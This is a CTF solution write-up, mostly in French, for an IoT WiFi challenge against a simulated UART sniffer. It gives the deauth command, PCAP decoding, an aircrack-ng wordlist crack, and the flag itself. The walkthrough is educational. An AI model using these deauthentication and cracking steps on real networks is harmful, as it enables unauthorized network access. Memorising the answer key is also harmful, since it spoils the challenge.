67 lines
1.1 KiB
Markdown
67 lines
1.1 KiB
Markdown
# Cr4ck_W1F1 — Solution
|
|
|
|
**Difficulty:** Medium | **Category:** IoT | **Flag:** `CTF{CR4CK_W1F1_EXAMPLE}`
|
|
|
|
> **Note:** Challenge en cours de finalisation — le flag sera mis à jour avant le déploiement.
|
|
|
|
## Overview
|
|
|
|
UART WiFi sniffer tool. Capture un WPA2 handshake, crack le mot de passe, puis
|
|
connecte au réseau pour lire le flag.
|
|
|
|
- **TX (port 1111)**: Read only
|
|
- **RX (port 2222)**: Write only
|
|
|
|
## Steps
|
|
|
|
1. Ouvrir deux terminaux :
|
|
|
|
```bash
|
|
nc <host> 1111 # TX — lecture
|
|
nc <host> 2222 # RX — écriture
|
|
```
|
|
|
|
1. Dans RX, démarrer le sniffer et forcer un re-handshake :
|
|
|
|
```text
|
|
sniffer start
|
|
deauth TestNet 02:00:00:aa:00:01
|
|
sniffer stop
|
|
```
|
|
|
|
1. Sur TX, récupérer le bloc PCAP base64 entre les marqueurs :
|
|
|
|
```text
|
|
PCAP_BASE64_BEGIN
|
|
...
|
|
PCAP_BASE64_END
|
|
```
|
|
|
|
Sauvegarder et décoder :
|
|
|
|
```bash
|
|
base64 -d handshake.b64 > handshake.pcap
|
|
```
|
|
|
|
1. Cracker la capture :
|
|
|
|
```bash
|
|
aircrack-ng -w rockyou.txt -b 02:00:00:10:00:01 handshake.pcap
|
|
# → KEY FOUND! [ sunshine ]
|
|
```
|
|
|
|
1. Se connecter au réseau et lire le flag :
|
|
|
|
```text
|
|
connect TestNet sunshine
|
|
cat /flag.txt
|
|
```
|
|
|
|
## Flag
|
|
|
|
`CTF{CR4CK_W1F1_EXAMPLE}`
|
|
|
|
## Author
|
|
|
|
Eun0us
|